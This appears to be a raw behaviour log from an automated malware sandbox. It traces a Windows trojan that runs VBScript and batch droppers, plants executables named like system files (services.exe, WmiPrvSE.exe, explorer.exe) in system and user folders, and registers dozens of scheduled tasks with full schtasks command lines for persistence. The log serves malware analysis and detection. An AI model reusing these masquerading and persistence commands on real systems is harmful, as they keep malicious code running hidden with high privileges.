          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F2AC07_2_00007FFAAC3F2AC0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F2BF07_2_00007FFAAC3F2BF0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FA0057_2_00007FFAAC3FA005
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F2BF07_2_00007FFAAC3F2BF0
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3FA0057_2_00007FFAAC3FA005
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B9E360 appears 52 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B9E28C appears 35 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B9ED00 appears 31 times
          Source: comProviderServer.exe.1.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WmiPrvSE.exe.7.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: bdoMPjmZJHMIJMdqEctkzcHPTiy.exe.7.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: bdoMPjmZJHMIJMdqEctkzcHPTiy.exe0.7.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: StartMenuExperienceHost.exe.7.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: bdoMPjmZJHMIJMdqEctkzcHPTiy.exe1.7.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: file.exe | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.evad.winEXE@43/33@0/0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B86EC9 GetLastError,FormatMessageW,1_2_00B86EC9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B99E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,1_2_00B99E1C
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | File created: C:\Program Files\Windows Defender Advanced Threat Protection\services.exe
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | File created: C:\Users\Public\Downloads\explorer.exe
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\eb81551d4b228cccaab002c77cb01b12655e3c98
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | File created: C:\Users\user\AppData\Local\Temp\uw0cV3nz2C
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" "
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs"
Source: C:\Users\user\Desktop\file.exe | Command line argument: sfxname 1_2_00B9D5D4
Source: C:\Users\user\Desktop\file.exe | Command line argument: sfxstime 1_2_00B9D5D4
Source: C:\Users\user\Desktop\file.exe | Command line argument: STARTDLG 1_2_00B9D5D4
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\reviewDriverIntosessionnet\comProviderServer.exe "C:\reviewDriverIntosessionnet\comProviderServer.exe"
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 12 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: mscoree.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: apphelp.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: kernel.appcore.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: version.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: uxtheme.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: windows.storage.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: wldp.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: profapi.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: cryptsp.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: rsaenh.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: cryptbase.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: sspicli.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: amsi.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: userenv.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: ntmarta.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: wbemcomn.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: propsys.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: dlnashext.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: wpdshext.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: edputil.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: urlmon.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: iertutil.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: srvcli.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: netutils.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: wintypes.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: appresolver.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: bcp47langs.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: slc.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: sppc.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\reviewDriverIntosessionnet\comProviderServer.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
